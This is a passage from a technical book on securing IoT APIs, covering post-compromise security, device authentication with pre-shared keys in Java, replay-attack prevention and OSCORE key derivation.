If the attacker manages to steal the long-term secret key used by the device, then it can
be impossible to regain security without human involvement. In the worst case, the
device may need to be replaced or restored to factory settings and reconfigured. The
ratcheting mechanisms discussed in section 12.4.3 do not protect against compro-
mise, because if the attacker ever gains access to the current ratchet key, they can eas-
ily calculate all future keys.
12 Real path-traversal exploits are usually more complex than this, relying on subtle bugs in URL parsing routines.
Hardware security measures, such as a secure element, TPM, or TEE (see sec-
tion 12.4.1) can provide post-compromise security by ensuring that an attacker never
directly gains access to the secret key. An attacker that has active control of the device
can use the hardware to compromise communications while they have access, but
once that access is removed, they will no longer be able to decrypt or interfere with
future communications.
A weaker form of post-compromise security can be achieved if an external source
of key material is mixed into a ratcheting process periodically. If the client and server
can agree on such key material without the attacker learning it, then any new derived
keys will be unpredictable to the attacker and security will be restored. This is weaker
than using secure hardware, because if the attacker has stolen the device’s key, then,
in principle, they can eavesdrop or interfere with all future communications and inter-
cept or control this key material. However, if even a single communication exchange
can occur without the attacker interfering, then security can be restored.
There are two main methods to exchange key material between the server and
the client:
They can directly exchange new random values encrypted using the old key.
For example, a key distribution server might periodically send the client a
new key encrypted with the old one, as described in section 12.4.2, or both
parties might send random nonces that are mixed into the key derivation process
used in ratcheting (section 12.4.3); a sketch of this approach follows the
definition below. This is the weakest approach because
a passive attacker who is able to eavesdrop can use the random values directly
to derive the new keys.
They can use Diffie-Hellman key agreement with fresh random (ephemeral) keys to
derive new key material. Diffie-Hellman is a public key algorithm in which the
client and server only exchange public keys but use local private keys to derive a
shared secret. Diffie-Hellman is secure against passive eavesdroppers, but an
attacker who is able to impersonate the device with a stolen secret key may still
be able to perform an active man-in-the-middle attack to compromise security. IoT
devices deployed in accessible locations may be particularly vulnerable to man-
in-the-middle attacks because an attacker could have physical access to network
connections.
DEFINITION
A man-in-the-middle (MitM) attack occurs when an attacker actively
interferes with communications and impersonates one or both parties. Proto-
cols such as TLS contain protections against MitM attacks, but they can still
occur if long-term secret keys used for authentication are compromised.
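As a rough sketch of the first option, fresh nonces from both parties can be mixed into the ratchet using the HKDF helper from chapter 11, extended with the extract() method shown in chapter 13 (the method name and label here are illustrative):

// Mix both parties' fresh nonces into the ratchet so the new key is
// unpredictable to an attacker who only knows the old key
static Key ratchetWithFreshMaterial(Key oldKey, byte[] clientNonce,
        byte[] serverNonce) throws GeneralSecurityException {
    var salt = ByteBuffer.allocate(clientNonce.length + serverNonce.length)
            .put(clientNonce).put(serverNonce).array();
    var prk = HKDF.extract(salt, oldKey.getEncoded());
    return HKDF.expand(prk, "iot-key-ratchet", 32, "HMAC");
}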
Post-compromise security is a difficult goal to achieve and most solutions come with
costs in terms of hardware requirements or more complex cryptography. In many IoT
applications, the budget would be better spent trying to avoid compromise in the first
place, but for particularly sensitive devices or data, you may want to consider adding a
secure element or other hardware security mechanism to your devices.
Pop quiz

7 True or False: Ratcheting can provide post-compromise security.

The answer is at the end of the chapter.

Answers to pop quiz questions

1 b. NEED_WRAP indicates that the SSLEngine needs to send data to the other party during the handshake.
2 b. AES-GCM fails catastrophically if a nonce is reused, and this is more likely in IoT applications.
3 False. Fresh keys are derived for each session by exchanging random values during the handshake.
4 d. Diffie-Hellman key agreement with fresh ephemeral key pairs is used to ensure forward secrecy.
5 b. MRAE modes are more robust in the case of nonce reuse.
6 False. SIV-AES is less secure if a nonce is reused but loses a relatively small amount of security compared to other modes. You should still aim to use unique nonces for every message.
7 False. Ratcheting achieves forward secrecy but not post-compromise security. Once an attacker has compromised the ratchet key, they can derive all future keys.
Summary
IoT devices may be constrained in CPU power, memory, storage or network
capacity, or battery life. Standard API security practices, based on web protocols
and technologies, are poorly suited to such environments and more efficient
alternatives should be used.
UDP-based network protocols can be protected using Datagram TLS. Alterna-
tive cipher suites can be used that are better suited to constrained devices, such
as those using AES-CCM or ChaCha20-Poly1305.
X.509 certificates are complex to verify and require additional signature valida-
tion and parsing code, increasing the cost of supporting secure communications.
Pre-shared keys can eliminate this overhead and use more efficient symmetric
cryptography. More capable devices can combine PSK cipher suites with ephem-
eral Diffie-Hellman to achieve forward secrecy.
IoT communications often need to traverse multiple network hops employing
different transport protocols. End-to-end encryption and authentication can be
used to ensure that confidentiality and integrity of API requests and responses
are not compromised if an intermediate host is attacked. The COSE standards
provide similar capabilities to JOSE with better suitability for IoT devices, but
alternatives such as NaCl can be simpler and more secure.
Constrained devices often lack access to good sources of entropy to generate ran-
dom nonces, increasing the risk of nonce reuse vulnerabilities. Misuse-resistant
authenticated encryption modes, such as SIV-AES, are a much safer choice for
such devices and offer similar benefits to AES-CCM for code size.
Key distribution is a complex problem for IoT environments, which can be
solved through simple key management techniques such as the use of key dis-
tribution servers. Large numbers of device keys can be managed through key
derivation, and ratcheting can be used to ensure forward secrecy. Hardware
security features provide additional protection against compromised devices.
Securing IoT APIs
This chapter covers

Authenticating devices to APIs
Avoiding replay attacks in end-to-end device authentication
Authorizing things with the OAuth2 device grant
Performing local access control when a device is offline

In chapter 12, you learned how to secure communications between devices using
Datagram TLS (DTLS) and end-to-end security. In this chapter, you'll learn how to
secure access to APIs in Internet of Things (IoT) environments, including APIs
provided by the devices themselves and cloud APIs the devices connect to. In its
rise to become the dominant API security technology, OAuth2 is also popular for
IoT applications, so you'll learn about recent adaptations of OAuth2 for
constrained devices in section 13.3. Finally, we'll look at how to manage access control
decisions when a device may be disconnected from other services for prolonged
periods of time in section 13.4.
13.1 Authenticating devices
In consumer IoT applications, devices are often acting under the control of a user, but
industrial IoT devices are typically designed to act autonomously without manual user
intervention. For example, a system monitoring supply levels in a warehouse would be
configured to automatically order new stock when levels of critical supplies become
low. In these cases, IoT devices act under their own authority much like the service-to-
service API calls in chapter 11. In chapter 12, you saw how to provision credentials to
devices to secure IoT communications, and in this section, you’ll see how to use those
to authenticate devices to access APIs.
13.1.1 Identifying devices
To be able to identify clients and make access control decisions about them in your
API, you need to keep track of legitimate device identifiers and other attributes of the
devices and link those to the credentials that device uses to authenticate. This allows
you to look up these device attributes after authentication and use them to make
access control decisions. The process is very similar to authentication for users, and
you could reuse an existing user repository such as LDAP to also store device profiles,
although it is usually safer to separate users from device accounts to avoid confusion.
Where a user profile typically includes a hashed password and details such as their
name and address, a device profile might instead include a pre-shared key for that
device, along with manufacturer and model information, and the location of where
that device is deployed.
The device profile can be generated at the point the device is manufactured, as
shown in figure 13.1. Alternatively, the profile can be built when devices are first deliv-
ered to an organization, in a process known as onboarding.
Figure 13.1 Device details and unique identifiers are stored in a shared
repository where they can be accessed later. Unique device identifiers and
credentials are deployed to the device during manufacturing or onboarding, and the
device details and identifiers are combined into a device profile, together with the
encrypted PSK, and stored in a central repository such as an LDAP device directory.
DEFINITION
Device onboarding is the process of deploying a device and register-
ing it with the services and networks it needs to access.
Listing 13.1 shows code for a simple device profile with an identifier, basic model
information, and an encrypted pre-shared key (PSK) that can be used to communi-
cate with the device using the techniques in chapter 12. The PSK will be encrypted
using the NaCl SecretBox class that you used in chapter 6, so you can add a method
to decrypt the PSK with a secret key. Navigate to src/main/java/com/manning/
apisecurityinaction and create a new file named Device.java and copy in the contents
of the listing.
Listing 13.1   A device profile

package com.manning.apisecurityinaction;

import org.dalesbred.Database;
import org.dalesbred.annotation.DalesbredInstantiator;
import org.h2.jdbcx.JdbcConnectionPool;
import software.pando.crypto.nacl.SecretBox;

import java.io.*;
import java.security.Key;
import java.util.Optional;

public class Device {
    // Fields for the device attributes
    final String deviceId;
    final String manufacturer;
    final String model;
    final byte[] encryptedPsk;

    // Annotate the constructor so that Dalesbred knows how to
    // load a device from the database
    @DalesbredInstantiator
    public Device(String deviceId, String manufacturer,
            String model, byte[] encryptedPsk) {
        this.deviceId = deviceId;
        this.manufacturer = manufacturer;
        this.model = model;
        this.encryptedPsk = encryptedPsk;
    }

    // A method to decrypt the device PSK using NaCl's SecretBox
    public byte[] getPsk(Key decryptionKey) {
        try (var in = new ByteArrayInputStream(encryptedPsk)) {
            var box = SecretBox.readFrom(in);
            return box.decrypt(decryptionKey);
        } catch (IOException e) {
            throw new RuntimeException("Unable to decrypt PSK", e);
        }
    }
}
You can now populate the database with device profiles. Listing 13.2 shows how to ini-
tialize the database with an example device profile and encrypted PSK. Just like previ-
ous chapters you can use a temporary in-memory H2 database to hold the device
details, because this makes it easy to test. In a production deployment you would use a
database server or LDAP directory. You can load the database into the Dalesbred
library that you’ve used since chapter 2 to simplify queries. Then you should create
the table to hold the device profiles, in this case with simple string attributes (VARCHAR
in SQL) and a binary attribute to hold the encrypted PSK. You could extract these
SQL statements into a separate schema.sql file as you did in chapter 2, but because
there is only a single table, I’ve used string literals instead. Open the Device.java file
again and add the new method from the listing to create the example device database.
Listing 13.2   Populating the device database

static Database createDatabase(SecretBox encryptedPsk) throws IOException {
    // Create and load the in-memory device database
    var pool = JdbcConnectionPool.create("jdbc:h2:mem:devices",
            "devices", "password");
    var database = Database.forDataSource(pool);
    // Create a table to hold device details and encrypted PSKs
    database.update("CREATE TABLE devices(" +
            "device_id VARCHAR(30) PRIMARY KEY," +
            "manufacturer VARCHAR(100) NOT NULL," +
            "model VARCHAR(100) NOT NULL," +
            "encrypted_psk VARBINARY(1024) NOT NULL)");
    // Serialize the example encrypted PSK to a byte array
    var out = new ByteArrayOutputStream();
    encryptedPsk.writeTo(out);
    // Insert an example device into the database
    database.update("INSERT INTO devices(" +
            "device_id, manufacturer, model, encrypted_psk) " +
            "VALUES(?, ?, ?, ?)", "test", "example", "ex001",
            out.toByteArray());
    return database;
}
You’ll also need a way to find a device by its device ID or other attributes. Dalesbred
makes this quite simple, as shown in listing 13.3. The findOptional method can be
used to search for a device; it will return an empty result if there is no matching
device. You should select the fields of the device table in exactly the order they appear
in the Device class constructor in listing 13.1. As described in chapter 2, use a bind
parameter in the query to supply the device ID, to avoid SQL injection attacks.
Listing 13.3   Finding a device by ID

static Optional<Device> find(Database database, String deviceId) {
    // Use the findOptional method with the Device class, selecting the
    // device attributes in the same order they appear in the constructor.
    // A bind parameter supplies the device_id to avoid SQL injection.
    return database.findOptional(Device.class,
            "SELECT device_id, manufacturer, model, encrypted_psk " +
            "FROM devices WHERE device_id = ?", deviceId);
}
Now that you have some device details, you can use them to authenticate devices
and perform access control based on those device identities, which you’ll do in sec-
tions 13.1.2 and 13.1.3.
13.1.2 Device certificates
An alternative to storing device details directly in a database is to instead provide each
device with a certificate containing the same details, signed by a trusted certificate
authority. Although traditionally certificates are used with public key cryptography,
you can use the same techniques for constrained devices that must use symmetric
cryptography instead. For example, the device can be issued with a signed JSON Web
Token that contains device details and an encrypted PSK that the API server can
decrypt, as shown in listing 13.4. The device treats the certificate as an opaque token
and simply presents it to APIs that it needs to access. The API trusts the JWT because it
is signed by a trusted issuer, and it can then decrypt the PSK to authenticate and com-
municate with the device.
Listing 13.4   Encrypted PSK in a JWT claims set

{
  "iss": "https://example.com/devices",
  "iat": 1590139506,
  "exp": 1905672306,
  "sub": "ada37d7b-e895-4d55-9571-4df602e60c27",
  "psk": "jZvara1OnqqBZrz1HtvHBCNjXvCJptEuIAAAAJInAtaLFnYna9K0WxX4_IGPyztb8VUwo0CI_UmqDQgm"
}

The standard iss, iat, exp, and sub claims identify the device, while the psk claim holds an encrypted PSK that can be used to communicate with it.
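As a sketch of how an API might consume such a token, assuming the Nimbus JOSE+JWT library and a Base64url-encoded psk claim (a real implementation must also validate the exp, iss, and other claims):

// Verify the device "certificate" JWT and recover the encrypted PSK
static byte[] devicePsk(String token, byte[] trustedIssuerKey,
        Key pskDecryptionKey) throws Exception {
    var jwt = SignedJWT.parse(token);
    if (!jwt.verify(new MACVerifier(trustedIssuerKey))) {
        throw new SecurityException("Invalid device certificate");
    }
    var encryptedPsk = Base64.getUrlDecoder().decode(
            jwt.getJWTClaimsSet().getStringClaim("psk"));
    try (var in = new ByteArrayInputStream(encryptedPsk)) {
        return SecretBox.readFrom(in).decrypt(pskDecryptionKey);
    }
}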
This can be more scalable than a database if you have many devices, but makes it
harder to update incorrect details or change keys. A middle ground is provided by the
attestation techniques discussed in chapter 12, in which an initial certificate and key
are used to prove the make and model of a device when it first registers on a network,
and it then negotiates a device-specific key to use from then on.
13.1.3 Authenticating at the transport layer
If there is a direct connection between a device and the API it’s accessing, then you can
use authentication mechanisms provided by the transport layer security protocol. For
example, the pre-shared key (PSK) cipher suites for TLS described in chapter 12 pro-
vide mutual authentication of both the client and the server. Client certificate authenti-
cation can be used by more capable devices just as you did in chapter 11 for service
clients. In this section, we’ll look at identifying devices using PSK authentication.
During the handshake, the client provides a PSK identity to the server in the
ClientKeyExchange message. The API can use this PSK ID to locate the correct PSK for that
client. The server can look up the device profile for that device using the PSK ID at
the same time that it loads the PSK, as shown in figure 13.2. Once the handshake
has completed, the API is assured of the device identity by the mutual authentication
that PSK cipher suites achieve.
Figure 13.2 When the device connects to the API, it sends a PSK identifier in the TLS
ClientKeyExchange message. The API can use this to find a matching device profile with
an encrypted PSK for that device. The API decrypts the PSK and then completes the TLS
handshake using the PSK to authenticate the device.

In this section, you'll adjust the PskServer from chapter 12 to look up the device
profile during authentication. First, you need to load and initialize the device
database. Open the PskServer.java file and add the following lines at the start of the
main() method just after the PSK is loaded:
var psk = loadPsk(args[0].toCharArray());   // The existing line to load the example PSK
var encryptionKey = SecretBox.key();        // Create a new PSK encryption key
var deviceDb = Device.createDatabase(       // Initialize the database with the encrypted PSK
        SecretBox.encrypt(encryptionKey, psk));
The client will present its device identifier as the PSK identity field during the hand-
shake, which you can then use to find the associated device profile and encrypted PSK
to use to authenticate the session. Listing 13.5 shows a new DeviceIdentityManager
class that you can use with Bouncy Castle instead of the existing PSK identity manager.
The new identity manager performs a lookup in the device database to find a device
that matches the PSK identity supplied by the client. If a matching device is found,
then you can decrypt the associated PSK from the device profile and use that to
authenticate the TLS connection. Otherwise, return null to abort the connection.
The client doesn’t need any hint to determine its own identity, so you can also return
null from the getHint() method to disable the ServerKeyExchange message in the
handshake just as you did in chapter 12. Create a new file named
DeviceIdentityManager.java in the same folder as the Device.java file you created earlier and add the
contents of the listing.
Listing 13.5   The device IdentityManager

package com.manning.apisecurityinaction;

import org.bouncycastle.tls.TlsPSKIdentityManager;
import org.dalesbred.Database;

import java.security.Key;

import static java.nio.charset.StandardCharsets.UTF_8;

public class DeviceIdentityManager implements TlsPSKIdentityManager {
    private final Database database;
    private final Key pskDecryptionKey;

    // Initialize the identity manager with the device database
    // and PSK decryption key
    public DeviceIdentityManager(Database database, Key pskDecryptionKey) {
        this.database = database;
        this.pskDecryptionKey = pskDecryptionKey;
    }

    // Return a null identity hint to disable the ServerKeyExchange message
    @Override
    public byte[] getHint() {
        return null;
    }

    @Override
    public byte[] getPSK(byte[] identity) {
        // Convert the PSK identity into a UTF-8 string to use as the
        // device identity, then decrypt the associated PSK if the device
        // exists. Otherwise, return null to abort the connection.
        var deviceId = new String(identity, UTF_8);
        return Device.find(database, deviceId)
                .map(device -> device.getPsk(pskDecryptionKey))
                .orElse(null);
    }
}
To use the new device identity manager, you need to update the PskServer class again.
Open PskServer.java in your editor and change the lines of code that create the
PSKTlsServer object to use the new class:
var crypto = new BcTlsCrypto(new SecureRandom());
var server = new PSKTlsServer(crypto,
new DeviceIdentityManager(deviceDb, encryptionKey)) {
You can delete the old getIdentityManager() method too because it is unused now.
You also need to adjust the PskClient implementation to send the correct device ID
during the handshake. If you recall from chapter 12, we used an SHA-512 hash of the
PSK as the ID there, but the device database uses the ID "test" instead. Open
PskClient.java and change the pskId variable at the top of the main() method to use the
UTF-8 bytes of the correct device ID:
var pskId = "test".getBytes(UTF_8);
If you now run the PskServer and then the PskClient it will still work correctly, but
now it is using the encrypted PSK loaded from the device database.
EXPOSING THE DEVICE IDENTITY TO THE API
Although you are now authenticating the device based on a PSK attached to its device
profile, that device profile is not exposed to the API after the handshake completes.
Bouncy Castle doesn’t provide a public method to get the PSK identity associated with
a connection, but it is easy to expose this yourself by adding a new method to the
PSKTlsServer, as shown in listing 13.6. A protected variable inside the server contains the
TlsContext class, which has information about the connection (the server supports
only a single client at a time). The PSK identity is stored inside the SecurityParameters
class for the connection. Open the PskServer.java file and add the new
getPeerDeviceIdentity() method shown at the end of the listing. You can then retrieve the device identity after receiving a
message by calling:
var deviceId = server.getPeerDeviceIdentity();
CAUTION
You should only trust the PSK identity returned from
getSecurityParametersConnection(), which are the final parameters after the handshake
completes. The similarly named getSecurityParametersHandshake() contains
parameters negotiated during the handshake process before authentication
has finished and may be incorrect.
Listing 13.6   Exposing the device identity

var server = new PSKTlsServer(crypto,
        new DeviceIdentityManager(deviceDb, encryptionKey)) {
    @Override
    protected ProtocolVersion[] getSupportedVersions() {
        return ProtocolVersion.DTLSv12.only();
    }

    @Override
    protected int[] getSupportedCipherSuites() {
        return new int[] {
            CipherSuite.TLS_PSK_WITH_AES_128_CCM,
            CipherSuite.TLS_PSK_WITH_AES_128_CCM_8,
            CipherSuite.TLS_PSK_WITH_AES_256_CCM,
            CipherSuite.TLS_PSK_WITH_AES_256_CCM_8,
            CipherSuite.TLS_PSK_WITH_AES_128_GCM_SHA256,
            CipherSuite.TLS_PSK_WITH_AES_256_GCM_SHA384,
            CipherSuite.TLS_PSK_WITH_CHACHA20_POLY1305_SHA256
        };
    }

    // The new method exposes the client identity: look up the PSK
    // identity and decode it as a UTF-8 string
    String getPeerDeviceIdentity() {
        return new String(context.getSecurityParametersConnection()
                .getPSKIdentity(), UTF_8);
    }
};
The API server can then use this device identity to look up permissions for this device,
using the same identity-based access control techniques used for users in chapter 8.
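For example, a minimal sketch of an identity-based check using the Device profile from listing 13.1 (the manufacturer restriction is purely illustrative):

// Look up the authenticated device and apply a simple access rule
var deviceId = server.getPeerDeviceIdentity();
var device = Device.find(deviceDb, deviceId)
        .orElseThrow(() -> new SecurityException("Unknown device"));
if (!"example".equals(device.manufacturer)) {
    throw new SecurityException("Device not permitted to call this API");
}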
Pop quiz

1 True or False: A PSK ID is always a UTF-8 string.

2 Why should you only trust the PSK ID after the handshake completes?
a Before the handshake completes, the ID is encrypted.
b You should never trust anyone until you've shaken their hand.
c The ID changes after the handshake to avoid session fixation attacks.
d Before the handshake completes, the ID is unauthenticated so it could be fake.

The answers are at the end of the chapter.

13.2 End-to-end authentication
If the connection from the device to the API must pass through different protocols, as
described in chapter 12, authenticating devices at the transport layer is not an option.
In chapter 12, you learned how to secure end-to-end API requests and responses using
authenticated encryption with Concise Binary Object Representation (CBOR) Object
Signing and Encryption (COSE) or NaCl’s CryptoBox. These encrypted message for-
mats ensure that requests cannot be tampered with, and the API server can be sure
that the request originated from the device it claims to be from. By adding a device
identifier to the message as associated data,1 which you'll recall from chapter 6 is
authenticated but not encrypted, the API can look up the device profile to find the
key to decrypt and authenticate messages from that device.
Unfortunately, this is not enough to ensure that API requests really did come from
that device, so it is dangerous to make access control decisions based solely on the
Message Authentication Code (MAC) used to authenticate the message. The reason is
that API requests can be captured by an attacker and later replayed to perform the
same action again at a later time, known as a replay attack. For example, suppose you
are the leader of a clandestine evil organization intent on world domination. A moni-
toring device in your uranium enrichment plant sends an API request to increase the
speed of a centrifuge. Unfortunately, the request is intercepted by a secret agent, who
then replays the request hundreds of times, and the centrifuge spins too quickly, caus-
ing irreparable damage and delaying your dastardly plans by several years.
DEFINITION
In a replay attack, an attacker captures genuine API requests and
later replays them to cause actions that weren’t intended by the original client.
Replay attacks can cause disruption even if the message itself is authenticated.
1 One of the few drawbacks of the NaCl CryptoBox and SecretBox APIs is that they don’t allow authenticated
associated data.
To prevent replay attacks, the API needs to ensure that a request came from a legiti-
mate client and is fresh. Freshness ensures that the message is recent and hasn’t been
replayed and is critical to security when making access control decisions based on the
identity of the client. The process of identifying who an API server is talking to is
known as entity authentication.
DEFINITION
Entity authentication is the process of identifying who requested an
API operation to be performed. Although message authentication can confirm
who originally authored a request, entity authentication additionally requires
that the request is fresh and has not been replayed. The connection between
the two kinds of authentication can be summed up as: entity authentication =
message authentication + freshness.
In previous chapters, you’ve relied on TLS or authentication protocols such as OpenID
Connect (OIDC; see chapter 7) to ensure freshness, but end-to-end API requests need
to ensure this property for themselves. There are three general ways to ensure freshness:
API requests can include timestamps that indicate when the request was gener-
ated. The API server can then reject requests that are too old. This is the weak-
est form of replay protection because an attacker can still replay requests until
they expire. It also requires the client and server to have access to accurate
clocks that cannot be influenced by an attacker.
Requests can include a unique nonce (number-used-once). The server remem-
bers these nonces and rejects requests that attempt to reuse one that has
already been seen. To reduce the storage requirements on the server, this is
often combined with a timestamp, so that used nonces only have to be remem-
bered until the associated request expires. In some cases, you may be able to
use a monotonically increasing counter as the nonce, in which case the server only
needs to remember the highest value it has seen so far and reject requests that
use a smaller value. If multiple clients or servers share the same key, it can be
difficult to synchronize the counter between them all.
The most secure method is to use a challenge-response protocol shown in figure 13.3,
in which the server generates a random challenge value (a nonce) and sends it
to the client. The client then includes the challenge value in the API request,
proving that the request was generated after the challenge. Although more
secure, this adds overhead because the client must talk to the server to obtain a
challenge before they can send any requests.
DEFINITION
A monotonically increasing counter is one that only ever increases
and never goes backward and can be used as a nonce to prevent replay of API
requests. In a challenge-response protocol, the server generates a random chal-
lenge that the client includes in a subsequent request to ensure freshness.
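As an illustration of the counter-based approach, a server-side freshness check might look like the following sketch (the in-memory ConcurrentHashMap storage and method name are assumptions, not the book's code):

private final Map<String, Long> lastSeen = new ConcurrentHashMap<>();

// Accept a request only if its sequence number is strictly greater
// than the highest number previously seen for this device
boolean isFresh(String deviceId, long sequenceNumber) {
    var fresh = new boolean[1];
    lastSeen.compute(deviceId, (id, last) -> {
        if (last == null || sequenceNumber > last) {
            fresh[0] = true;
            return sequenceNumber;
        }
        return last; // stale or replayed: keep the old high-water mark
    });
    return fresh[0];
}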
Both TLS and OIDC employ challenge-response protocols for authentication. For
example, in OIDC the client includes a random nonce in the authentication request
498
CHAPTER 13
Securing IoT APIs
and the identity provider includes the same nonce in the generated ID token to
ensure freshness. However, in both cases the challenge is only used to ensure fresh-
ness of an initial authentication request and then other methods are used from then
on. In TLS, the challenge response happens during the handshake, and afterward a
monotonically increasing sequence number is added to every message. If either side
sees the sequence number go backward, then they abort the connection and a new
handshake (and new challenge response) needs to be performed. This relies on the
fact that TLS is a stateful protocol between a single client and a single server, but this
can’t generally be guaranteed for an end-to-end security protocol where each API
request may go to a different server.
Attacks from delaying, reordering, or blocking messages
Replay attacks are not the only way that an attacker may interfere with API requests
and responses. They may also be able to block or delay messages from being
received, which can cause security issues in some cases, beyond simple denial of
service. For example, suppose a legitimate client sends an authenticated “unlock”
request to a door-lock device. If the request includes a unique nonce or other mech-
anism described in this section, then an attacker won’t be able to replay the request
later. However, they can prevent the original request being delivered immediately and
then send it to the device later, when the legitimate user has given up and walked
away. This is not a replay attack because the original request was never received by
the API; instead, the attacker has merely delayed the request and delivered it at a
later time than was intended. http://mng.bz/nzYK describes a variety of attacks
against CoAP that don't directly violate the security properties of DTLS, TLS, or other
secure communication protocols. These examples illustrate the importance of good
threat modeling and carefully examining assumptions made in device communications.
A variety of mitigations for CoAP are described in http://mng.bz/v9oM, including
a simple challenge-response "Echo" option that can be used to prevent delay
attacks, ensuring a stronger guarantee of freshness.

Figure 13.3 A challenge-response protocol ensures that an API request is
fresh and has not been replayed by an attacker. The client's first API request
is rejected, and the API generates a random challenge value that it sends to
the client and stores locally. The client retries its request, including a response
to the challenge. The server can then be sure that the request has been freshly
generated by the genuine client and is not a replay attack.
13.2.1 OSCORE
Object Security for Constrained RESTful Environments (OSCORE; https://tools.ietf
.org/html/rfc8613) is designed to be an end-to-end security protocol for API requests
in IoT environments. OSCORE is based on the use of pre-shared keys between the cli-
ent and server and makes use of CoAP (Constrained Application Protocol) and COSE
(CBOR Object Signing and Encryption) so that cryptographic algorithms and mes-
sage formats are suitable for constrained devices.
NOTE
OSCORE can be used either as an alternative to transport layer secu-
rity protocols such as DTLS or in addition to them. The two approaches are
complementary, and the best security comes from combining both. OSCORE
doesn’t encrypt all parts of the messages being exchanged so TLS or DTLS
provides additional protection, while OSCORE ensures end-to-end security.
To use OSCORE, the client and server must maintain a collection of state, known as
the security context, for the duration of their interactions with each other. The secu-
rity context consists of three parts, shown in figure 13.4:
A Common Context, which describes the cryptographic algorithms to be used and
contains a Master Secret (the PSK) and an optional Master Salt. These are used
to derive keys and nonces used to encrypt and authenticate messages, such as
the Common IV, described later in this section.
A Sender Context, which contains a Sender ID, a Sender Key used to encrypt mes-
sages sent by this device, and a Sender Sequence Number. The sequence num-
ber is a nonce that starts at zero and is incremented every time the device sends
a message.
A Recipient Context, which contains a Recipient ID, a Recipient Key, and a Replay
Window, which is used to detect replay of received messages.
WARNING
Keys and nonces are derived deterministically in OSCORE, so if
the same security context is used more than once, then catastrophic nonce
reuse can occur. Devices must either reliably store the context state for the
life of the Master Key (including across device restarts) or else negotiate fresh
random parameters for each session.
Figure 13.4 The OSCORE context is maintained by the client and server and consists of three
parts: a common context contains a Master Key, Master Salt, and Common IV component.
Sender and Recipient Contexts are derived from this common context and IDs for the sender
and recipient. The context on the server mirrors that on the client, and vice versa.

DERIVING THE CONTEXT
The Sender ID and Recipient ID are short sequences of bytes and are typically only
allowed to be a few bytes long, so they can’t be globally unique names. Instead, they
are used to distinguish the two parties involved in the communication. For example,
some OSCORE implementations use a single 0 byte for the client, and a single 1 byte
for the server. An optional ID Context string can be included in the Common Con-
text, which can be used to map the Sender and Recipient IDs to device identities, for
example in a lookup table.
The Master Key and Master Salt are combined using the HKDF key derivation
function that you first used in chapter 11. Previously, you’ve only used the HKDF-
Expand function, but this combination is done using the HKDF-Extract method that
is intended for inputs that are not uniformly random. HKDF-Extract is shown in list-
ing 13.7 and is just a single application of HMAC using the Master Salt as the key and
the Master Key as the input. Open the HKDF.java file and add the extract method to
the existing code.
Listing 13.7   HKDF-Extract

// HKDF-Extract takes a random salt value and the input key material
public static Key extract(byte[] salt, byte[] inputKeyMaterial)
        throws GeneralSecurityException {
    var hmac = Mac.getInstance("HmacSHA256");
    // If a salt is not provided, then an all-zero salt is used
    if (salt == null) {
        salt = new byte[hmac.getMacLength()];
    }
    // The result is the output of HMAC using the salt as the key
    // and the key material as the input
    hmac.init(new SecretKeySpec(salt, "HmacSHA256"));
    return new SecretKeySpec(hmac.doFinal(inputKeyMaterial),
            "HmacSHA256");
}
The HKDF key for OSCORE can then be calculated from the Master Key and Master
Salt as follows:
var hkdfKey = HKDF.extract(masterSalt, masterKey);
The sender and recipient keys are then derived from this master HKDF key using the
HKDF-Expand function from chapter 10, as shown in listing 13.8. A context argument
is generated as a CBOR array, containing the following items in order:
The Sender ID or Recipient ID, depending on which key is being derived.
The ID Context parameter, if specified, or a zero-length byte array otherwise.
The COSE algorithm identifier for the authenticated encryption algorithm
being used.
The string “Key” encoded as a CBOR binary string in ASCII.
The size of the key to be derived, in bytes.
This is then passed to the HKDF.expand() method to derive the key. Create a new file
named Oscore.java and copy the listing into it. You’ll need to add the following
imports at the top of the file:
import COSE.*;
import com.upokecenter.cbor.CBORObject;
import org.bouncycastle.jce.provider.BouncyCastleProvider;
import java.nio.*;
import java.security.*;
Listing 13.8   Deriving the sender and recipient keys

private static Key deriveKey(Key hkdfKey, byte[] id,
        byte[] idContext, AlgorithmID coseAlgorithm)
        throws GeneralSecurityException {
    int keySizeBytes = coseAlgorithm.getKeySize() / 8;
    // The context is a CBOR array containing the ID, ID context,
    // algorithm identifier, and key size
    CBORObject context = CBORObject.NewArray();
    context.Add(id);
    context.Add(idContext);
    context.Add(coseAlgorithm.AsCBOR());
    context.Add(CBORObject.FromObject("Key"));
    context.Add(keySizeBytes);
    // HKDF-Expand is used to derive the key from the master HKDF key
    return HKDF.expand(hkdfKey, context.EncodeToBytes(),
            keySizeBytes, "AES");
}
The Common IV is derived in almost the same way as the sender and recipient keys, as
shown in listing 13.9. The label “IV” is used instead of “Key,” and the length of the IV
or nonce used by the COSE authenticated encryption algorithm is used instead of the
key size. For example, the default algorithm is AES_CCM_16_64_128, which requires
a 13-byte nonce, so you would pass 13 as the ivLength argument. Because our HKDF
implementation returns a Key object, you can use the getEncoded() method to con-
vert that into the raw bytes needed for the Common IV. Add this method to the
Oscore class you just created.
Listing 13.9   Deriving the Common IV

private static byte[] deriveCommonIV(Key hkdfKey,
        byte[] idContext, AlgorithmID coseAlgorithm, int ivLength)
        throws GeneralSecurityException {
    // Use the label "IV" and the length of the required nonce in bytes
    CBORObject context = CBORObject.NewArray();
    context.Add(new byte[0]);
    context.Add(idContext);
    context.Add(coseAlgorithm.AsCBOR());
    context.Add(CBORObject.FromObject("IV"));
    context.Add(ivLength);
    // Use HKDF-Expand but return the raw bytes rather than a Key object
    return HKDF.expand(hkdfKey, context.EncodeToBytes(),
            ivLength, "dummy").getEncoded();
}
Listing 13.10 shows an example of deriving the sender and recipient keys and
Common IV based on the test case from appendix C of the OSCORE specification
(https://tools.ietf.org/html/rfc8613#appendix-C.1.1). You can run the code to
verify that you get the same answers as the RFC. You can use
org.apache.commons.codec.binary.Hex to print the keys and IV in hexadecimal to
check the test outputs.
WARNING   Don’t use this master key and master salt in a real application! Fresh
keys should be generated for each device.
Listing 13.10   Deriving OSCORE keys and IV

public static void main(String... args) throws Exception {
    // The default algorithm used by OSCORE
    var algorithm = AlgorithmID.AES_CCM_16_64_128;
    // The Master Key and Master Salt from the OSCORE test case
    var masterKey = new byte[] {
            0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08,
            0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f, 0x10
    };
    var masterSalt = new byte[] {
            (byte) 0x9e, 0x7c, (byte) 0xa9, 0x22, 0x23, 0x78,
            0x63, 0x40
    };
    // Derive the HKDF master key.
    var hkdfKey = HKDF.extract(masterSalt, masterKey);
